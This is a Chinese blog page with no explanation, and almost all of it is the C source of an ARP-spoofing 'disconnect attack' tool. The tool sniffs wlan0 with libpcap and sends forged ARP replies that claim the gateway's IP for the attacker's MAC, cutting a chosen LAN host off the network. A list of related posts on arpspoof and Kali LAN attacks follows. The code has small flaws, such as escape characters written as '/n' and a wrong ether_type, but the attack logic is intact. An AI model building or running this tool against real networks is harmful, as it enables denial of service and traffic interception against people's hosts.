断网攻击,linux,arp

最新推荐文章于 2022-08-11 10:06:00 发布
最新推荐文章于 2022-08-11 10:06:00 发布
阅读量536 收藏 1
点赞数
分类专栏: 技术 文章标签: linux 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <netdb.h>
#include <errno.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <pthread.h>
#include <pcap.h>
#include <net/ethernet.h>
#include <netinet/ether.h>
#include <net/if.h>
#include <netinet/ip.h>
int sockfd; 
struct sockaddr_ll peer_addr; 
unsigned char my_ip[4] = {192, 168, 1,100}; //my ip address
unsigned char gateway_ip[4] = {192, 168, 1, 1}; //gateway ip address
unsigned char attack_ip[4] = {192, 168, 1, 8}; //ip address to be attacked
unsigned char my_mac[6] = {0x00,0x24,0x01,0x04,0x59,0x65 }; //my mac address
//封装arp包
struct arp_packet {
        struct ether_header  eh;
        struct ether_arp arp;
};
//封装ip包 
struct ip_packet{
    struct ether_header eh;
    struct iphdr ip;
};
void send_arp(const unsigned char* attack_ip);
void process_arppachet(struct arp_packet *packet);
void echo_head(char *);
void echo(char *);
void echo_end(char *);
/**
 * 发送arp包到攻击主机
 */
void send_arp(const unsigned char* attack_ip) {
        unsigned char broad_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};//发送广播包为了获取网关地址
        //开始构造arp桢
        struct arp_packet frame;
        memcpy(frame.eh.ether_dhost, broad_mac, 6);
        memcpy(frame.eh.ether_shost, my_mac, 6);
        frame.eh.ether_type = htons(ETH_P_ARP);
        frame.arp.ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
        frame.arp.ea_hdr.ar_pro = htons(ETH_P_IP);
        frame.arp.ea_hdr.ar_hln = 6;
        frame.arp.ea_hdr.ar_pln = 4;
        frame.arp.ea_hdr.ar_op = htons(ARPOP_REQUEST);
        memcpy(frame.arp.arp_sha, my_mac, 6);
        memcpy(frame.arp.arp_spa, my_ip, 4);
        memcpy(frame.arp.arp_tha, broad_mac, 6);
        memcpy(frame.arp.arp_tpa, attack_ip, 4);
        sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr));
        printf("success send arp request to 192.168.1.%d/n", attack_ip[3]);
}
/**
 * 分析arp包
 */
void process_arppacket(struct arp_packet *packet) {
    echo_head("process_arppacket");
    struct arp_packet *old_frame = packet;
    struct arp_packet frame;
    memcpy(&frame, packet, sizeof(frame));
    int ar_op = ntohs(frame.arp.ea_hdr.ar_op);
    // ------------------------------------arp frame info-------------------------------------------------------
    if (ar_op == ARPOP_REQUEST)
        printf("arp request/t");
    if (ar_op == ARPOP_RREPLY)
        printf("arp reply /t");
    char ip_buf[128];
    inet_ntop(AF_INET, &old_frame->arp.arp_spa, ip_buf, sizeof(ip_buf));
    printf("[%s](%s)",
            ether_ntoa((struct ether_addr *) &old_frame->arp.arp_sha), ip_buf);
    printf("/t->/t");
    memset(ip_buf, 0, sizeof(ip_buf));
    inet_ntop(AF_INET, &old_frame->arp.arp_tpa, ip_buf, sizeof(ip_buf));
    printf("[%s](%s)",
            ether_ntoa((struct ether_addr *) &old_frame->arp.arp_tha), ip_buf);
    printf("/n");
// ---------------------------------------------------------------------------------------------
     if(ar_op == ARPOP_REPLY && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == my_ip[3]) { //normal arp reply from attack_ip
             //bulid faked arp reply frame
             memcpy(frame.eh.ether_dhost, old_frame->arp.arp_sha, 6);
             memcpy(frame.eh.ether_shost, my_mac, 6);
             frame.eh.ether_type = htons(ARPOP_REPLY);
             memcpy(frame.arp.arp_tha, old_frame->arp.arp_sha, 6);
             memcpy(frame.arp.arp_tpa, attack_ip, 4);
             memcpy(frame.arp.arp_sha, my_mac, 6);
             memcpy(frame.arp.arp_spa, gateway_ip, 4);
             //send faked arp reply frame
             sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&peer_addr, sizeof(peer_addr));
             printf("success faked 192.168.1.%d /n", (old_frame->arp.arp_spa)[3]);
     }
     if(((ar_op == ARPOP_REQUEST) && (old_frame->arp.arp_spa)[3] == gateway_ip[3]) ||
        (ar_op == ARPOP_REQUEST && (old_frame->arp.arp_spa)[3] == attack_ip[3] && (old_frame->arp.arp_tpa)[3] == gateway_ip[3])) { //case 2 a
             sleep(1);
             send_arp(attack_ip);
     }

}
void process_ippacket(struct iphdr *ip){
    echo_head("process_ippacket");
    struct in_addr addr;
    addr.s_addr = ip->saddr;
    printf("%s---->",inet_ntoa(addr));
    addr.s_addr = ip->daddr;
    printf("%s/n",inet_ntoa(addr));
    int protocol = ip->protocol;
    switch(protocol){
        case IPPROTO_TCP:
            printf("tcp/n");
            break;
        case    IPPROTO_UDP:
            printf("udp");
            break;
        case IPPROTO_SCTP:
            break;
        default:
            printf("the protocol is:%d/n",protocol);
            break;
    }
    echo_end("process_ippacket");
}
//pcap 回掉函数,用于监听网络上的数据包
void callback(unsigned char *args, const struct pcap_pkthdr *head,
        const unsigned char *packet) {
    struct ether_header *eh = (struct ether_header *) packet;
    switch (ntohs(eh->ether_type))
    {
        case ETHERTYPE_ARP:
            if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) {
                process_arppacket((struct arp_packet *) packet);
            }
            break;
        case ETHERTYPE_IP:
            if (head->len > sizeof(struct ether_header) + sizeof(struct iphdr)) {
                process_ippacket((struct iphdr *)(packet+sizeof(struct ether_header)));
            }
            break;
        default:
            printf("ether type is:%x/n",eh->ether_type);
            break;
    }
}
//通过pcap监听网络情况
void *arp_listen(void *arg) {
        char errbuf[1024];
        char *dev= "wlan0";
        pcap_t *handle = pcap_open_live(dev, 2048, 1, 1000, errbuf);
        if(handle == NULL)printf("pcap_open_live():%s/n", errbuf);
        unsigned int net,mask;
        if(pcap_lookupnet(dev, &net, &mask, errbuf) == -1)printf("pcap_lookupnet():%s/n", errbuf);
        struct bpf_program fp;
        if(pcap_compile(handle, &fp, "arp or ip", 0, net) == -1)printf("pcap_compile():%s/n", errbuf);
        if(pcap_setfilter(handle, &fp) == -1)printf("pcap_setfilter():%s/n", errbuf);
        while(pcap_loop(handle, -1, callback, NULL) != -1);
        return NULL;
}
int main(int argc, char **argv) {
        pthread_t tid;
        pthread_create(&tid, NULL, arp_listen, NULL);
        sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
        if(sockfd == -1)perror("socket()");
        memset(&peer_addr, 0, sizeof(peer_addr));
        peer_addr.sll_family = AF_PACKET;
        struct ifreq req;
        strcpy(req.ifr_name, "wlan0");
        if(ioctl(sockfd, SIOCGIFINDEX, &req) != 0)perror("ioctl()");
        peer_addr.sll_ifindex = req.ifr_ifindex;
        peer_addr.sll_protocol = htons(ETH_P_ARP);
        send_arp(attack_ip);//给攻击ip发送伪造的arp包
        pthread_exit(NULL);//退出主线程
        return 0;
}
void echo_head(char *str){
    if(str==NULL){
            return;
    }
    printf("------------------------------------------------BEGIN %s------------------------------------------------/n",str);
}
void echo(char *str){
    if(str==NULL){
        return;
    }
    printf("%s/n",str);
}
void echo_end(char *str){
    if(str==NULL){
            return;
    }
    printf("------------------------------------------------END %s------------------------------------------------/n",str);
}&nbsp;
黎明马上就要来临
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过 Kali Linux 暴力破解 WiFi
FMJXG的博客
07-10 6508
通过 Kali Linux 暴力破解 WiFi,所需工具:Kali Linux系统 、无线网卡(免驱动)
使用Kali Linux进行ARP断网攻击
橘子女侠
11-20 1万+
使用Kali进行ARP断网攻击 1. ARP协议: ARP(Address Resolution Protocol,地址解析协议),位于TCP/IP协议栈中的网络层,负责将某个IP地址转化成对应的MAC地址。 主机发送信息时将包含目标IP地址的ARP请求广播到网络上的所有主机,并接收返回消息,以此确定目标的物理地址; 收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,...
linux 路由断网攻击,断网攻击linuxarp
weixin_35019131的博客
05-14 206
#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include int sockfd;struct sockaddr_ll peer_addr;unsigned char my...
使用Kali Linux ARP欺骗实现局域网断网攻击
guyu的博客
10-15 5511
Kali Linux ARP欺骗攻击局域网 首先 什么是ARP欺骗?   ARP欺骗(英语:ARP spoofing),又称ARP毒化(ARP poisoning,网络上多译为ARP病毒)或ARP攻击,是针对以太网地址解析协议(ARP)的一种攻击技术,通过欺骗局域网内访问者PC的网关MAC地址,使访问者PC错以为攻击者更改后的MAC地址是网关的MAC,导致网络不通。此种攻击可让攻击者获取局域网上的数据包甚至可篡改数据包,且可让网络上特定计算机或所有计算机无法正常连线。最早探讨ARP欺骗的文章是由Yuri V
Kali Linux使用arpspoof命令进行断网攻击ARP欺骗)
热门推荐
湖北杰哥的博客
11-21 7万+
kali使用arpspoof命令进行ARP欺骗,最终效果是利用kali干扰物理机不能正常上网。
局域网ARP攻击是什么 局域网ARP断网攻击的解决方法
10-01
经常遭受到一些ARP断网攻击,另外一些电脑用户的电脑也时候会遭受APR攻击,下面为大家介绍下ARP攻击是什么以及ARP断网攻击解决办法
基于Jpcap的ARP断网攻击源码
04-27
### 基于Jpcap的ARP断网攻击原理与实现 #### 一、概述 在网络安全领域,ARP(Address Resolution Protocol)攻击是一种常见的网络威胁手段。本文将深入解析一个基于Jpcap库的ARP断网攻击源码,并对其实现机制进行...
arp断网攻击怎么办.docx
09-26
arp断网攻击怎么办.docx
如何修复局域网ARP断网攻击-局域网断网攻击软件.docx
01-20
### 如何修复局域网ARP断网攻击 #### ARP攻击简介 ARP(Address Resolution Protocol)攻击是一种常见的局域网安全威胁,它通过篡改局域网内的ARP缓存表来实施中间人攻击(Man-in-the-Middle Attack),使得正常...
ensp加kali实现arp欺骗攻击
04-21
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
Kali Linux 实战(一):局域网断网攻击ARP攻击
qq_41374940的博客
06-23 5068
工具:ArpSpoof命令:    arpspoof -i (网卡) -t  (目标IP 网关)    网卡:kali虚拟机 = eth0 (ifconfig命令查询)   目标IP: win10物理机 = 169.254.xxx.xxx(cmd --&gt; ipconfig)    网关:win10 = 192.168.1.1    注:局域网IP查询        fping -asg 19...
ARP攻击之Kali Linux局域网断网攻击
weixin_30832351的博客
12-24 1589
特别声明: 我们学习研究网络安全技术的目的应是为了维护网络世界的安全,保护自己和他人的私有信息不被非法窃取和传播。请您遵守您所在地的法律,请勿利用本文所介绍的相关技术做背离道德或者违反法律的事情。 Special statement: The purpose of our study of cyber security technology should be to maintain...
Kali linux 局域网arp断网攻击
weixin_44475281的博客
08-11 5174
Kali linux 局域网arp断网攻击 什么是arp断网攻击ARP断网攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。 首先,你需要将kali的IP地址调整至与被攻击电脑在同一网络,如果是VMware虚拟机需要设置网卡为桥接模......
linux arpspoof命令,Kali Linux使用arpspoof命令进行断网攻击ARP欺骗)
weixin_42491664的博客
04-28 1989
(最近公务员考试复习彻底不在状态,晚上就开始玩玩kali虚拟机,不知道这个国考究竟是虐人仍是虐心!)kali使用arpspoof命令进行ARP欺骗。作法是获取目标主机IP镜像流量,再进行ARP欺骗。这次测试实在局域网中进行,使用kali虚拟机和Windows10物理机测试。最终效果是利用kali干扰物理机不能正常上网。————————————————————————————————nginx具体方...
利用卡里(LinuxARP断网攻击
weixin_51615420的博客
12-01 1311
学习目标: 提示:这里可以添加学习目标 例如:一周掌握 Java 入门知识 学习内容: 提示:这里可以添加要学的内容 例如: 1、 搭建 Java 开发环境 2、 掌握 Java 基本语法 3、 掌握条件语句 4、 掌握循环语句 学习时间: 提示:这里可以添加计划学习的时间 例如: 1、 周一至周五晚上 7 点—晚上9点 2、 周六上午 9 点-上午 11 点 3、 周日下午 3 点-下午 6 点 学习产出: 提示:这里统计学习计划的总量 例如: 1、 技术笔记 2 遍 2、CSDN 技术博客 3 篇
Kali Linux系列之区域网断网攻击
微信公众号:码奋
04-13 2928
​ (你的世界是个什么样的世界?你说,我们倾听!) ----------------- 区域网断网攻击 关于局域网断网攻击,对局域网内某个IP或全部IP进行攻击,让局域网内某个IP或全部IP断网。 原理:关于arp断网攻击是基于arp协议的缺陷,这其实是arp欺骗的时候配置错误引起的现象。就是以我的网卡代替网关。因为目标要上网的数据包需要经过网关,但现在我欺骗了目标主机,让它...
linux arp 攻击,Kali Linux实战:使用arpspoof工具进行断网攻击ARP欺骗)
weixin_30227565的博客
05-25 1073
kali linux使用arpspoof命令进行ARP欺骗。做法是获取目标主机IP镜像流量,再进行ARP欺骗。此次测试在局域网中进行,使用kali虚拟机和Windows10物理机测试。最终效果是利用kali虚拟机干扰物理机不能正常上网。实验环境:物理机IP是:192.168.1.112(局域网)物理机默认网关是:192.168.1.1实战步骤如下:一、Windows下CMD打开命令提示符,输入ip...
kali渗透实战01--局域网断网攻击
spec_yue
03-31 2065
以前大学的时候就收到过arp欺骗,到现在没找打凶手,于是现在报复社会 这里用到Arpspoof Arpspoof -i 网卡 -t 目标IP 网关 kali:网卡 eth0 目标ip:192.168.1.100 网关:192.168.1.1 所以命令就是arpspoof -i eth0 -t192.168.1.100 192.168.1.1 怎么看局域网中目标ip呢 Fping -asg 192....
Kali Linux学习笔记·局域网断网攻击
303snowing
10-04 3842
Kali Linux学习笔记 局域网断网攻击局域网ip扫描: fping -asg [host] 更多参数使用 fping -help eg: fping -asg 192.168.0.0局域网断网攻击arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host eg: arpspoof -i
arp欺骗和断网攻击区别
最新发布
07-27
ARP欺骗(Address Resolution Protocol spoofing)和断网攻击是两种不同类型的网络攻击ARP欺骗是一种利用ARP协议的漏洞来欺骗网络中其他设备的攻击方式。在一个以太网中,设备通过ARP协议将IP地址映射到MAC地址,以便进行通信。攻击者可以发送伪造的ARP响应消息,将自己的MAC地址与目标IP地址进行映射,从而欺骗网络中的其他设备将数据发送到攻击者的设备上。这样,攻击者可以窃取通信数据、进行中间人攻击等。 断网攻击是一种使目标设备无法正常访问网络的攻击方式。攻击者可以通过多种手段实现断网攻击,比如发送大量无效数据包、使用网络拥塞、发起拒绝服务(DoS)攻击等。这些攻击会导致目标设备无法正常接收或发送网络数据,从而使其与网络断开连接。 总结来说,ARP欺骗是一种通过欺骗其他设备来窃取通信数据的攻击方式,而断网攻击是一种通过各种手段使目标设备与网络断开连接的攻击方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值